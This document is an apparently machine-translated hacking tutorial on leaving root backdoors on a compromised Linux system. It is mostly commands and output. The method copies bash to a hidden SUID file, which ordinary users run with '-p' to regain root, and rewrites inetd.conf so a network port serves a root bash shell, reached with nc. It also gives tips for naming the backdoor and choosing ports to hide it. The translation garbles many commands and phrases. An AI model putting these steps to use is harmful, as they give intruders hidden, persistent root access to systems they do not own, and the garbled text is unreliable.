CentOS is carefully exploited by the suid shell and inetd backdoor.

You are now a root user and want to leave a backdoor.

System Environment:

Dawg :~ # Uname-

Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

1. SUID shell

First, switch to the root user and run the following command:

Dawg :~ # Cp/bin/bash/. wootdawg :~ # Chmod 4755/. wootdawg :~ # Ls-al/. woot-rwsr-xr-x 1 root 690668 Jul 24/. woot

Of course, you can also start other names that are more concealed. I want you to come up with a lot of good names, even though you are cool and witty. It is not necessary to hide the file (Add "." at the beginning of the file name to hide the file in any file directory ).

Now, as a common user, we can enable this backdoor:

Fw @ dawg :~ $ Iduid = 1000 (fw) gid = 1000 (fw) groups = 1000 (fw) fw @ dawg :~ $/. Woot. woot-2.05b $ iduid = 1000 (fw) gid = 1000 (fw) groups = 1000 (fw). woot-2.05b $

Why not?

Because bash2 has some protection measures for suid, but this is not broken:

. Woot-2.05b $/. woot-p

. Woot-2.05b # id

Uid = 1000 (fw) gid = 1000 (fw) euid = 0 (root) groups = 1000 (fw)

Use the-p parameter to obtain a root shell. This euid indicates a valid user id (here we can stamp the knowledge of these IDs)

Note that the full path must be used when a common user executes this SUID shell.

TIPS:

How to find files with SUID:

Dawg :~ # Find/-perm + 4000-ls

In this case, a file with a SUID is returned.

2. Remote BACKDOOR: Use/etc/inetd. conf

We use vi to modify the/etc/inetd. conf file.

Original file:

# Chargen dgram udp wait root internal

# Discard stream tcp nowait root internal

# Discard dgram udp wait root internal

# Daytime stream tcp nowait root internal

To:

# Discard stream tcp nowait root internal

# Discard dgram udp wait root internal

Daytime stream tcp nowait root/bin/bash-I

Enable inetd:

Dawg :~ # Inetd

If you want to force restart inetd:

Dawg :~ # Ps-ef | grep inetdroot 362 1 0 Jul22? 00:00:00/usr/sbin/inetdroot 13769 13643 0 00:00:00 pts/1 grep inetddawg :~ # Kill-HUP 362

Now we can use nc to kill chrysanthemum:

C: tools 192.168.1.77: inverse host lookup failed: h_errno 11004: NO_DATA

(UNKNOWN) [192.168.1.77] 13 (daytime) open

Bash: no job control in this shell

Bash-2.05b # bash-2.05b #

Bash-2.05b # iduid = 0 (root)

Gid = 0 (root) groups = 0 (root) bash-2.05b # uname-

Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

TIPS:

You can modify the/etc/services file and add the following:

Woot 6666/tcp # edevil backdoor service

Then modify/etc/inetd. conf:

Woot stream tcp nowait root/bin/bash-I

We can change it to some common ports for hiding.

In fact, the/etc/shadow file is safe only when the root password is cracked!